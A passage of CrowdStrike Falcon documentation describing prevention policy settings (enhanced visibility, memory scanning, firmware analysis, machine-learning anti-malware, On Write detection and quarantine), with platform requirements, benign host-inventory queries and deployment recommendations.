- This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.
Default roles: Falcon Admin
Supported platform: Linux

Hosts running high-volume PHP CMS applications such as WordPress, Pimcore, and Drupal might experience high CPU utilization after enabling the Enhance PHP visibility prevention policy setting. You can mitigate this issue by enabling the PHP Script Optimization setting, which is disabled by default.

When both the Enhance PHP visibility and PHP script optimization settings are enabled, the sensor limits its reporting. Instead of reporting on every script execution, it reports only when a PHP script is compiled by the PHP server. This optimization is specifically designed for environments with frequent, high-volume PHP script execution. When enabled, you should see a significant reduction in PhpExecuteScript events.

Extended User Mode Data Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor support: Falcon sensor for Windows 7.04 or later
Supported operating systems: Falcon-supported versions of Windows 10 and later, Windows Server 2016 and later

Important: This setting is not supported on Windows ARM64-based hosts.

Extended User Mode Data Visibility (XUMD) allows the sensor to monitor information in running processes by loading a library that can hook various user-mode APIs.

Some endpoint telemetry can be gathered only through user-mode hooking. XUMD provides a flexible way to provide information about which APIs a process is leveraging. This information feeds a variety of prevention mechanisms that are available to the sensor based on the accumulated behavior observed.

Unlike Additional User Mode Data Visibility (AUMD), the cloud can dynamically modify XUMD visibility without a sensor update.

Supported prevention policy settings for XUMD:

Disabled: The extended visibility, detection, and prevention capabilities of XUMD are disabled. The hooking library is not loaded into processes.
Cautious: XUMD is enabled with high-confidence hooks that are accessible to detection and prevention logic. Performance and compatibility impact at this setting is expected to be negligible, but we recommend testing this setting in a staging environment before deploying it to production.
Moderate: XUMD is enabled with high- and medium-confidence hooks that are accessible to detection and prevention logic. This setting can result in performance or application-compatibility impact but provides expanded visibility. Performance impact at this setting is expected to be negligible, but we recommend testing this setting in a staging environment before deploying it to production.
Aggressive: XUMD is enabled with high-, medium-, and low-confidence hooks that are accessible to detection and prevention logic. This setting can result in significant performance or application-compatibility problems. This setting is not recommended for production environments without significant prior testing in a staging environment.
Extra Aggressive: XUMD is enabled with high-, medium-, low-, and experimental-confidence hooks that are accessible to detection and prevention logic. This setting can result in significant performance problems or application compatibility problems. This setting is not recommended for any production environment but might be appropriate for penetration and stress testing in specific limited deployments.

Because XUMD is loaded in user processes that were not developed with it, negative interactions with other software might occur. This is most common when other security products are installed. In certain software environments, conflicting software might crash, fail to start, or suffer degraded performance. In these scenarios, move a test system into a policy where XUMD is disabled, reboot the host, and then retry the software. If the issue is resolved, open a Support case and request assistance in resolving the conflict. Support can assist in diagnosing and resolving these issues between XUMD and specific software.

To determine which processes have loaded the XUMD DLL, run the following command at the command line:

tasklist /m csxumd*

Environment Variable Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor support: Falcon sensor for Linux 7.30 or later running in User Mode
- This setting is only supported on sensors running in User mode.Sensors running in Kernel Mode (KM) will not support this setting and enabling this setting on hosts running in KM will have no effect.
Default roles: Falcon Admin
CrowdStrike clouds: Available in all clouds

The Environment Variable Visibility prevention policy setting allows the sensor to apply uprobes, user-level dynamic tracing, to extend the existing environment variable visibility into user space hooks.

When the Environment Variable Visibility setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor for Linux increases visibility into changes made to process environment variables.

When this setting is enabled, the following actions take place:

Track empty process environment variables
Identify clearing of environment variable states
Monitor and detect changes to process environment variables

This prevention policy produces the CriticalEnvironmentVariableChanged and the ProcessEnvironmentEmpty sensor events.

Filesystem Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 6.37 and later

The Filesystem Visibility setting allows the sensor to monitor file system activity for additional telemetry and improved detections.

Tip: This setting increases the number of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.

Monitored Filesystem Event Types

Important: With Falcon for Linux on IBM zSystems, the Falcon sensor doesn’t support file system events.

Executable:

ELFFileWritten
MachOFileWritten
NewExecutableWritten
NewScriptWritten
PeFileWritten

Document:

MSDocxFileWritten
MSPptxFileWritten
MSVsdxFileWritten
MSXlsxFileWritten
OleFileWritten
OoxmlFileWritten
PdfFileWritten
RtfFileWritten

Archive:

ArcFileWritten
BZip2FileWritten
CabFileWritten
GzipFileWritten
JarFileWritten
JavaClassWritten
RarFileWritten
SevenZipFileWritten
TarFileWritten
XarFileWritten
ZipFileWritten

Dump:

DmpFileWritten

Image:

BmpFileWritten
GifFileWritten
JpegFileWritten
PngFileWritten
TiffFileWritten

Network file systems

These file systems are treated as network file systems:

CIFS
NFS

Excluded file systems

The sensor monitors regular files and directories only.

These file systems are skipped:

binfmtfs
cgroup
cgroup2
configfs
debugfs
devpts
efivarfs
futexfs
hugetlbfs
mqueue
pipefs
proc
pstorefs
securityfs
selinux
smack
sockfs
sysfs
tracefs

FTP Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 6.48 and later

Enable the FTP Visibility prevention policy setting on the Falcon sensor to monitor unencrypted FTP traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Tip: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.

Hardware-Enhanced Exploit Detection

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Hardware-Enhanced Exploit Detection leverages underlying hardware acceleration and security enhancement capabilities to improve hardware-assisted Control Flow Integrity (CFI) validation and exploit detection. This enhancement improves detection for sophisticated exploits that might otherwise evade standard CFI validation using kernel operations.

Supported on hosts running Windows 10 v1809+, Server 2016 v1803+, Server 2019, and Server 2022. Intel Skylake or later and Goldmont or later CPUs are also supported - not supported on AMD processors. Not supported in virtual environments and the feature is disabled on virtual hosts.

Important: Unsupported hosts aren’t affected by this policy.

HTTP Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 6.48 and later

Enable the HTTP Visibility prevention policy setting on the Falcon sensor to monitor unencrypted HTTP traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Note: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization. Depending on the role of the host, such as a web server with HTTP Visibility enabled, you could also see an increase in CPU utilization.

HTTP Visibility and Detection

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported operating systems: Windows 7, Windows 8.1, Windows 10, Windows 11
- Not Supported: Windows Server OS

Important: This feature doesn't activate on Windows Server OS. It activates on supported workstation versions of Windows 7, Windows 8.1, Windows 10, and Windows 11 only.

This setting allows the sensor to monitor unencrypted HTTP traffic and certain encrypted HTTPS (WinINet) traffic looking for known malicious patterns. The sensor uses the Windows Filtering Platform (WFP) and Event Tracing for Windows (ETW) to monitor URLs, content encoding, languages, user agents, and HTTP methods visible using the HTTP header of the connection. When information matches known malicious IOAs, the sensor generates detection and/or prevention events. When a detection occurs, all collected data is rolled up into an event that is sent to the cloud. Traffic that doesn't match an IOA never leaves the host.

HTTP and WinINet HTTPS are commonly used by malware for command and control or for exfiltration attempts.

If Redacted HTTP Detection Details is enabled, privacy sensitive data is redacted prior to being sent to the cloud.

Interpreter-Only Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Interpreter-Only Visibility provides AMSI-based and AMSI-emulation-based introspection of the PowerShell engine and helps identify malicious script or command usage. On non-AMSI-capable hosts it provides introspection of the PowerShell engine using DLL injection. This setting must be enabled to leverage the System Management Engine Visibility policy option, and it is also a prerequisite for the associated prevention feature Suspicious Scripts and Commands found in the Execution Blocking category.

Memory Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 7.21 and later

When enabled, the Memory Visibility prevention policy setting increases visibility into the following:

Process memory maps associated with a process, including existing processes that were initiated before this setting was enabled.
- Visibility into these memory maps can help identify instances where Return Oriented Programming (ROP) based exploits have been executed and reveal malicious software running shellcode from memory.
The various system calls needed to detect process injection.
- Increased visibility into system calls can help with detecting malicious software that injects itself into other processes.
Any shared objects being loaded into a process.
- This can help with detecting shared object sideloading or identifying shared objects that are embedded backdoors, such as the xz backdoor.

Network Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 6.37 and later

The Network Visibility setting controls the Falcon sensor’s ability to monitor network activity for additional telemetry and improved detections.

Tip: This setting increases the number of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.

Network events supported on Linux

Important: With Falcon for Linux on IBM zSystems, support for network events requires Falcon Sensor for Linux version 6.53.15003 or later.

Network Events:

RawBindIP4
RawBindIP6
NetworkConnectIP4
NetworkReceiveAcceptIP4
NetworkListenIP4
NetworkConnectIP6
NetworkReceiveAcceptIP6
NetworkListenIP6
DnsRequest
SuspiciousDnsRequest

Other network events:

NetworkCloseIP4
NetworkCloseIP6

Redacted HTTP Detection Details

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported operating systems: Windows 7, Windows 8.1, Windows 10, Windows 11
- Not Supported: Windows Server OS

Important: This feature doesn't activate on Windows Server OS. It activates on supported workstation versions of Windows 7, Windows 8.1, Windows 10, and Windows 11 only.

If this setting is enabled, certain privacy-sensitive information from HTTP Detection events, including URL, raw HTTP header and POST bodies (if present) are redacted prior to the data being sent to the cloud. This doesn't affect the generation of HTTP Detections but eliminates additional details that would otherwise be included, details which may include personal information depending on the malware in question.

Redacting detection details may adversely impact your threat hunting capabilities. The redacted data cannot be recovered. When this setting is disabled and the additional details are provided, the information is used to improve the response to detection events.

Script-Based Execution Visibility

Requirements:

Subscriptions:
- For Windows: Falcon Prevent
- For Mac and Linux: Falcon Insight XDR or Falcon Prevent
Supported platforms: Windows, Mac, Linux
Sensor support:
- All supported versions of Falcon sensor for Windows and Mac
- Falcon sensor for Linux 6.32 and later
- Falcon Container sensor for Linux 7.35 and later

Important: For ARM64-based hosts running Windows 11, you must have Falcon sensor for Windows version 6.56 or later. This setting is not supported for ARM64-based hosts running Windows 10.

Turn on the Script-Based Execution Visibility prevention policy setting to enable the Falcon sensor to monitor the contents of scripts and shells that are popular mechanisms for executing malicious code on hosts. This setting doesn't kill or block scripts.

Windows visibility:

Script-Based Execution Visibility provides AMSI-based inspection of the PowerShell engine and several scripting languages. It helps identify malicious script or command usage on Windows 10 and 11-based hosts and on Server 2016, 2019, and 2022-based hosts. Like Engine Full Visibility, it also intercepts execution of PowerShell scripts and commands from any application using the PowerShell engine, but it does so using AMSI. If an executed PowerShell script generates a detection, you can view any interactive commands used in the Process Operation area of the detection.

When Script-Based Execution Visibility is enabled, the Falcon sensor acts as a Registered AMSI anti-malware provider. The sensor determines if VBA scripts run from Microsoft Office applications are malicious. If not, it instructs the macro to run. Learn more about AMSI at Microsoft Windows Dev Center.

Important: Quarantine & Security Center Registration must be enabled to use Script-Based Execution Visibility. This setting quarantines PowerShell script files that are found to be malicious.

Scripting languages:
- Excel 4.0 macros
- JScript
- VBA Macros
- VBScript
Shells:
- PowerShell

Mac visibility:

Scripting languages:
- Applescript
- JavaScript
- Perl
- PHP
- Python
- Ruby
Shells:
- bash
- csh
- ksh
- sh

Linux visibility:

Scripting languages:
- Groovy
- JavaScript (node.js)
- Lua
- Perl
- PHP
- Pwsh
- Python
- Ruby
Shells:
- ash
- bash
- csh
- dash
- ksh
- sh
- tcsh
- zsh

SSH Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor support: Falcon sensor for Linux 7.31 or later, running in user mode
- This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.
Default roles: Falcon Administrator
Supported platform: Linux

The SSH Visibility prevention policy setting provides a comprehensive view of authenticated SSH connections and the actions performed during an SSH session. When the SSH Visibility prevention policy setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor for Linux improves visibility into connections accepted by all SSH daemons and services.

When this setting is enabled, the sensor does the following:

Traces authenticated SSH connections, including file transfer sessions, with full IPv4/IPv6 connection information.
Extracts public key information (in SHA-256 hash format) that is sent to servers for authentication.
Provides indicators of compromise by fingerprinting clients on the basis of client version, public keys, and internal algorithms. This feature also tracks server versions.
Links each SSH session to all the commands executed through that connection using the SSHSessionId.

This prevention policy produces a new SSHClientAuthenticated event. Additionally, ProcessRollup2 events contain an SSHSessionId field when they originate from a traced SSH connection. This field can be used to link back to an SSHClientAuthenticated event.

The enhanced telemetry from this setting improves the detection and prevention of malicious attacks, including MITRE tactics and techniques such as Lateral Movement, Command and Control, and Ingress Tool Transfer.

System Management Engine Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Where the Interpreter-Only Visibility policy option gives visibility into built-in PowerShell interpreter applications, System Management Engine Visibility intercepts execution of PowerShell scripts and commands from any application using the PowerShell engine using DLL injection. This feature inspects at the scripting engine level for the most prolific Windows scripting languages.

TLS Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 6.49 and later

Enable the TLS Visibility prevention policy setting on the Falcon sensor to monitor encrypted TLS traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Note: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization. Depending on the role of the host, such as a web server with TLS Visibility enabled, you could also see an increase in CPU utilization.

WSL 2 Visibility

Requirements:

Subscription: Falcon Prevent or Falcon Insight XDR
Sensor: Falcon sensor for Windows 7.26 or later
Default roles:
- Can configure prevention policies:
  - Falcon Administrator
  - Prevention Policy Manager

CrowdStrike clouds: Available in all clouds
Additional system requirements: 64-bit x86-64 versions of Windows that support WSL 2 and are supported for use with the Falcon sensor for Windows. For more info, see Supported operating systems.

Enable the WSL 2 visibility prevention policy setting to gain high level visibility into Windows Subsystem for Linux 2 (WSL 2) Linux instances using the Falcon sensor WSL plug-in library.

Hardware-Enhanced Visibility category

Memory Scanning with GPU

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor support: Falcon sensor for Windows 6.45 and later
System requirements:
- Supported operating systems: Windows 10 version 1607 (RS1) and later
  
  Note: Windows Server 2016 and later are supported in configurations that meet processor and GPU requirements. This is uncommon in server hardware platforms.
- Processor and architecture: Intel - 6th Generation Intel Core (SkyLake) processors or later with integrated GPU.
- Integrated GPU: Integrated Intel Graphics, enabled in BIOS, and corresponding Intel Graphics drivers and DirectX 11 libraries installed. These libraries are typically installed by default.
- Virtual hosts: Not supported. The setting will be disabled on virtual hosts.

Increase visibility into potential "executable-less" attacks, also known as "file-less" attacks, and traditional file-based attacks on your Windows hosts. This setting allows the sensor to perform memory scans that search for malicious artifacts in memory. Scans are triggered off of certain observed behaviors and patterns.

An instance of CsFalconContainer.exe is added to hosts when the setting is enabled on them. When the setting is disabled, this process is deactivated.

For enhanced detection capability, also enable the Additional User Mode Data Visibility (AUMD) setting. Because memory scans on suspicious behaviors are triggered by micro behaviors, some might only be captured when this setting is enabled.

Identify supported endpoints

Gather a list of hosts that have been online within the last 7 days and meet the hardware, OS, and software requirements to support Memory Scanning.

Go to Investigate > Search > Advanced event search and run this query:

(#event_simpleName=SystemCapacity CpuVendor=0 CpuProcessorName=/Intel\(R\)\s+Core\(TM\)\s+i/i) OR (#event_simpleName=OsVersionInfo MajorVersion=10 BuildNumber>=14393) OR (#event_simpleName=DriverLoad FileName=/igd/i) | groupBy(aid, function=([count(#event_simpleName, distinct=true, as=eventCount), collect([CpuProcessorName, ProductName])])) | eventCount=3 | regex("Intel\(R\)\s+Core\(TM\)\s+(?<processorShortName>i\d+\-\S+)", field=CpuProcessorName, strict=false)

System performance safeguards

A number of safeguards help to ensure that CrowdStrike's memory scanning doesn't degrade system performance.

CrowdStrike has partnered with Intel Corporation to use state-of-the-art Accelerated Memory Scanning (AMS). AMS uses fine-tuned algorithms to search a large memory space in a highly-performant way, offloading computation to an integrated Graphics Processing Unit (GPU) when one is available.
By using GPU offload, there is minimal impact to CPU usage during a memory scan.
Guardrails around memory scan iteration size and total memory size ensure constraints against runaway performance.

As with all new prevention policies, the recommended best practice is to test this setting on a representative sample of hosts before enabling it widely across your organization.

Memory Scanning with CPU

Requirements:

Subscription: Falcon Insight or Falcon Prevent
Sensor support: Falcon sensor for Windows 6.47 and later
System requirements:
- Supported operating systems:
  - Windows 8.1 and later
  - Windows Server 2012 R2 and later
- Processor and architecture: All Intel processors (AMD not supported)
- Virtual hosts: Supported
Default roles: Falcon Administrator configures prevention policies
CrowdStrike clouds: Available in US-1, US-2, and EU-1

Extend the capabilities provided by Memory Scanning with CPU to hosts that don't have integrated GPUs. Enable both settings to allow the sensor to perform memory scans that search for malicious artifacts in memory across even more of your Windows hosts and all Intel processors.

An instance of CsFalconContainer.exe is added to hosts when the setting is enabled on them. When the setting is disabled, this process is deactivated.

Identify supported endpoints

Gather a list of hosts that have been online within the last 7 days and meet the hardware, OS, and software requirements to support CPU-Based Memory Scanning.

Go to Investigate > Search > Advanced event search and run this query:

event_platform=Win (#event_simpleName=SystemCapacity CpuVendor=0 CpuProcessorName=/Intel\(R\)/) OR (#event_simpleName=OsVersionInfo BuildNumber>=9600) | groupBy(aid, function=([count(#event_simpleName, distinct=true, as=eventCount), selectLast([CpuProcessorName, ProductName, AgentVersion])])) | eventCount=2 | CpuProcessorName=/^Intel\(R\)/ | drop(["eventCount"])

System performance safeguards

To help ensure that CrowdStrike's memory scanning doesn't degrade system performance, we minimize the impact on hosts by leveraging CPU Rate Limiting. This puts a 20 percent cap on the CPU that can be spent on memory scanning.

As with all new prevention policies, the recommended best practice is to test this setting on a representative sample of hosts before enabling it widely across your organization.

Firmware category

BIOS Firmware Deep Visibility

Requirements:

Subscription: Falcon Insight XDR
Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Enabling this setting activates the SPI Flash BIOS image analysis. It may result in a minor increase in boot time, but enables additional visibility into your BIOS image.

This setting enables the Falcon sensor to analyze the BIOS for compromised images and BIOS related vulnerabilities. Upon reboot, the Falcon sensor analyzes both certain platform configuration settings as well as the SPI flash to extract register data, as well as the BIOS image on that host. In addition to reboots, a re-analysis of system configuration is also done when resuming from sleep or hibernation.

This setting slows down the system boot by about 4-7 seconds.

We recommend appropriate testing to monitor system startup performance before full deployment.

On Windows, this feature is enabled using a driver called CSFirmwareAnalysis.sys. In order to enable BIOS Image Verification on supported Dell Windows hosts, the BIOS Deep Visibility setting must be enabled and Dell Trusted Device Agent must be installed. For more info about installing Dell Trusted Device Agent, see Dell Trusted Device Product Support.

Windows Virtual Hosts (VMware / Citrix / Hyper-V) are considered as having Unsupported Processors, and therefore Security Configurations Checks, BIOS Prevalence Checks, and BIOS Integrity Checks aren't performed on virtual hosts.

Cloud Machine Learning category

The Cloud Machine Learning category includes both Cloud Anti-malware and Adware & PUP. Both feature separate level sliders for Detection (report only) and Prevention (takes action). The right side of the slider produces the most results but may include more false positives. We don't recommend using the Extra-Aggressive setting outside of PEN testing scenarios.

Cloud Machine Learning is a critical component in the detection and prevention of known, emerging, and zero-day malware and ransomware attacks.

Enable detection first at a level above that set for prevention. Triage detection data and allowlist false positives as appropriate by hash through IOC Management and/or by file/path through machine learning exclusion. When you are confident the majority of your applications have executed, increase the detection and prevention sliders one notch each and repeat triage and allowlisting. Repeat until you have reached the recommended settings.

Cloud machine learning doesn't conflict with traditional antivirus tools.

Cloud-Based Anti-Malware

Requirements:

Subscription: Falcon Insight XDR (detection only) or Falcon Prevent
Supported platforms: Windows, Mac, and Linux

Note: With Falcon for Linux on IBM zSystems, cloud machine learning is enabled but not beneficial because of the lack of a malware corpus for this platform.

This cloud-based machine learning setting covers file attribute analysis and file analysis. File attribute analysis aims to stop known malware that meets a specified certainty threshold. Instead of storing millions of known malware hashes on the client, CrowdStrike's Cloud antivirus (AV) feature provides real-time blocking against high-confidence known malware based on a combination of AV detection and file properties that are analyzed by the CrowdStrike cloud using machine learning. This protects against known malware without putting a significant burden on the client. Each process is queried in real-time against our Cloud AV service and is prevented from executing if it matches high-confidence, known malware.

File analysis involves stopping malware that has been statically analyzed and flagged as malicious using CrowdStrike's machine learning techniques. These techniques allow you to analyze files without executing them. It enables you to find new malware without the need for signatures and reliance on antivirus tools.

Cloud Anti-malware for Microsoft Office Files

Requirements:

Subscription: Falcon Insight XDR (detection only), Falcon Prevent
Note: Falcon Insight XDR customers can detect malicious Microsoft Office macros. Falcon Prevent customers can detect and remediate malicious Microsoft Office macros.
Operating system: Windows

Use cloud machine learning (cloud ML) to identify when malicious macros in Microsoft Office files get written to disk. If prevention is enabled, Falcon performs one of these actions:

Quarantines the infected Office files.
Removes malicious macros from infected Office files and keeps their original file name and path.

The cloud ML-based Office file macro analysis only happens on file write.

To activate this feature for Falcon sensor for Windows version 7.33 and later:

Detections:
- Enable Detection setting for Cloud anti-malware for Microsoft Office files.
Preventions:
- Enable Prevention setting for Cloud anti-malware for Microsoft Office files.
- Enable Quarantine AMP_PLACEHOLDER security center registration.

To activate this feature for Falcon sensor for Windows versions 7.32 and earlier:

Detections:
- Enable Detection setting for Cloud anti-malware for Microsoft Office files.
- Enable Detect on write.
Preventions:
- Enable Prevention setting for Cloud anti-malware for Microsoft Office files.
- Enable Quarantine AMP_PLACEHOLDER security center registration.
- Enable Quarantine on write.

Note: The current cloud ML model does not detect XLM (Excel 4.0) macros, which are already disabled by default from Microsoft.

We recommend that you update your registry settings to disable Office macros by default, which will mitigate the risk of malicious macro execution.

Quarantined files appear on the Quarantined files page. You can enable Office macro detection without turning on prevention if you don’t want to quarantine or remove detected macros.

Note: Office files aren’t uploaded to the Falcon cloud. They won’t be available for download from the Quarantined Files dashboard, and won’t go to Sandbox for detonation.

The existing Laroux Malware Cleanup Toolcan still be used to scan and clean pre-existing Laroux-based infections on endpoints. Newly written files with Laroux are detected and prevented.

Microsoft Office File Malicious Macro Removal

Requirements:

Subscription: Falcon Insight XDR (detection only), Falcon Prevent

Note: Falcon Insight XDR customers can detect malicious Microsoft Office macros. Falcon Prevent customers can detect and remediate malicious Microsoft Office macros.
Supported platform: Windows

Enable removal of malicious macros from infected Office files when detections are generated by either IOAs or cloud ML.

Note: The Malicious Macro Removal feature requires the Quarantine on Write Prevention policy toggle enabled in order to function.

Remediated Office files can be restored to their original form by undoing the action in the Remediation page. To avoid unintended data loss during a restore attempt, the sensor won’t overwrite an existing file with the same file name. You should move, rename, or delete the remediated file to clear the path before attempting the restore.

Cloud-Based Adware & Pup

Requirements:

Subscription: Falcon Insight XDR (detection only) or Falcon Prevent
Supported platforms: Windows and Mac

Cloud-Based Adware & Pup is identical in function to Cloud-Based Anti-Malware, but is focused on executables classified as Adware and/or as Potentially Unwanted Programs (PUPs). Adware and PUPs are often considered just a nuisance, but they can be used to install malicious files.

Sensor Machine Learning category

The Sensor Machine Learning category includes Sensor Anti-malware on all supported OS platforms, and Adware & PUP on macOS. They feature separate level sliders for Detection (report only) and Prevention (takes action). The right side of the slider produces the most results but may include more false positives. We don't recommend using the Extra-Aggressive setting outside of PEN testing scenarios.

Sensor Machine Learning is a critical component in the detection and prevention of known, emerging, and zero-day malware and ransomware attacks.

Enable detection first at a level above that set for prevention. Triage detection data and allowlist false positives as appropriate by hash through IOC Management and/or by file or path through machine learning exclusion. When you are confident the majority of your applications have executed, increase the detection and prevention sliders one notch each and repeat triage and allowlisting. Repeat until you have reached the recommended settings.

Sensor-Based Anti-Malware

Requirements:

Subscription: Falcon Insight XDR (detection only) or Falcon Prevent
Supported platforms: Windows, Mac, and Linux

Important: With Falcon for Linux on IBM zSystems, the Falcon sensor doesn’t support sensor anti-malware.

Provides machine learning-based on-sensor AV protection for malicious files, including offline protection.

Sensor ML has zero-day detection capabilities that traditional AV products cannot match, so we strongly recommend enabling Sensor ML Prevention as per our best practices.

Enhanced machine learning for larger files

Requirements:

Subscription: Falcon Insight XDR (detection only) or Falcon Prevent
Supported platform: Windows

Supports ML analysis of larger file sizes.

Note: ML analysis of larger files requires additional endpoint resources. Internal testing showed an increase in processing time of a few seconds for every 100MB in file size. This feature has been beta tested by a number of customers over the past few months with no reports of adverse effects. We recommend that you test this in your own environment before deploying broadly.

On Demand Scan is not supported by this enhancement. Only files detected on write or on execute are supported.

All existing allowlisting and exclusion tools which support ML-based detections also support this setting, including machine learning exclusion and IOC Management.

Sensor Adware & PUP

Requirements:

Subscription: Falcon Insight XDR (detection only) or Falcon Prevent
Supported platform: Mac

Sensor Adware and PUP is identical in function to Sensor-Based Anti-Malware, but is focused on executables classified as Adware and/or as Potentially Unwanted Programs (PUPs). Adware and PUPs are often considered just a nuisance, but they can be used to install malicious files.

On Write category

The sensor machine learning-based On Write prevention category supports detecting and quarantining files on write, which helps eliminate malware on your hosts before the malware can execute. Configure your prevention policies to have the Falcon sensor use machine learning to analyze suspicious portable executable (PE) files on Windows or Mach-O files, which includes dynamic library (DYLIB) files, on Mac when they're written to disk.

The On Write prevention policy category contains the Detect on Write, On Write Script Visibility, and Quarantine on Write settings. When Detect on Write is enabled, the Falcon sensor generates a detection when a malicious PE or Mach-O file is written to disk. When Quarantine on Write is enabled, the Falcon sensor quarantines these malicious files.

Important: To use the Quarantine on Write setting, you must enable the Quarantine & Security Center Registration setting (for Windows) or the Quarantine setting (for Mac) in your prevention policy’s Quarantine category.

The sensitivity of the On Write settings are tied to the level of the policy's Cloud-Based Anti-Malware and Sensor-Based Anti-Malware machine learning settings. These anti-malware settings determine how cautiously or aggressively files are considered to be malicious, whether known hashes that are analyzed by the CrowdStrike cloud or unknown hashes that are scanned by the sensor. These settings can impact the number of detections generated and files quarantined. For more info, see Cloud Machine Learning category and Sensor Machine Learning category.

Detect on Write detections are shown in Endpoint security > Monitor > Endpoint detections. On Write Script Visibility is available in Endpoint security > Prevention policies > On Write. Quarantine on Write quarantined file details are available in Endpoint security > Monitor > Quarantined files, where they can be downloaded or released from quarantine.

Hash-based custom IOCs and file- and path-based machine learning exclusions also apply to On Write detections. However, On Write settings don't support detecting on or quarantining blocklisted hash-based IOCs for any vendor-signed Windows or macOS binaries.

Important: Quarantining files on write on removable devices or network shares isn't supported for macOS.

Recommended best practices

Before enabling Quarantine on Write, enable Detect on Write and monitor detections for a sufficient amount of time for your applications to have executed. This facilitates detection triage and allowlisting of false positives.
Within Sensor Capabilities, enable the Unknown Detection-Related Executables and Unknown Executables settings in your prevention policies so that unknown PE and Mach-O files can be automatically uploaded to the CrowdStrike cloud. This helps improve machine learning performance, which helps reduce the false positive rates associated with novel files detected on write.
For best practices about configuring prevention policy settings, including Detect on Write settings, see Prevention Policy Best Practice Guidelines.

Detect on Write

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platforms: Windows, Mac

Due to a Microsoft NTFS bug that was fixed in later versions of Windows, the OnWrite settings don't support and are automatically disabled on these operating systems:
- Windows Server 2012
- Windows Server 2012 R2
- Windows 8.1
- Windows 10 v1507 (Threshold 1)
- Windows 10 v1511 (Threshold 2)
Sensor support:
- Windows: Falcon sensor for Windows 6.33 and later
- Mac: Falcon sensor for Mac 6.57 and later

Have the Falcon sensor report a detection when a suspicious PE or Mach-O file is written to disk, rather than waiting for it to execute.

On Write Script File Visibility

Requirements:
- Subscription: Falcon Insight XDR or Falcon Prevent
- Supported platforms: Windows, Linux
- Sensor support:
  - Falcon sensor for Windows 6.53 and later
  - Falcon sensor for Linux 7.16.16903 and later

Note: Falcon sensor for Windows 6.53 detects Python script files only, while Falcon sensor for Windows 7.03 and later detects Python, .BAT, and .CMD files.

Note: For this to operate on Linux, the Filesystem Visibility prevention policy setting must be enabled. For more info, see Filesystem Visibility.

For Windows, this setting generates ScriptFileWrittenInfo event telemetry data when a detected (suspicious) script file is being written to disk.

For Linux, this setting generates ScriptControlDetectInfo event telemetry data when a detected (suspicious) script file has been written to disk.

Linux script file visibility includes:

Any file that starts with the character sequence #!
Any file with a known script extension, including:
- .action
- .asa
- .ashx
- .asmx
- .asp*
- .aspq
- .awk
- .axd
- .bat
- .cer
- .cf*
- .cgi
- .config
- .ctp
- .dbm
- .do
- .groovy
- .hphp
- .htaccess
- .inc
- .js
- .js*
- .lua
- .module
- .phar
- .php*
- .pht
- .pl
- .ps1
- .py
- .rb
- .rem
- .sh
- .soap
- .swf
- .vbs
- .wss
- .yaws
- .*html

Note: Renaming an existing script file's extension will not trigger an On Write evaluation, but the script file is still examined on execute.

Quarantine on Write

Requirements:

Subscription: Falcon Prevent
Supported platforms: Windows, Mac

Due to a Microsoft NTFS bug that was fixed in later versions of Windows, the OnWrite settings don't support and are automatically disabled on these operating systems:
- Windows Server 2012
- Windows Server 2012 R2
- Windows 8.1
- Windows 10 v1507 (Threshold 1)
- Windows 10 v1511 (Threshold 2)
Sensor support:
- Windows: Falcon sensor for Windows 6.33 and later
- Mac: Falcon sensor for Mac 6.57 and later

Quarantine files detected on write. In order to enable Quarantine on Write, Detect on Write must be enabled.

Quarantine category

Quarantine & Security Center Registration

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Enable Quarantine & Security Center Registration on Windows and Quarantine on Mac to quarantine executable files after they are prevented by next-gen antivirus (NGAV).

Quarantine and traditional AV OAS should not be enabled simultaneously, as this can potentially lead to race conditions, issues with Quarantine functions, and so on. If you enable Quarantine on either OS, we recommend setting NGAV Sensor Machine Learning Prevention to Moderate or higher and also disabling/removing other antivirus solutions.

If Quarantine & Security Center Registration is enabled, Falcon registers as AV with the Windows WSC on Windows workstations. This also automatically disables Windows Defender on Windows workstations.

Because Windows servers don't have the WSC, they function differently with regard to Windows Defender:

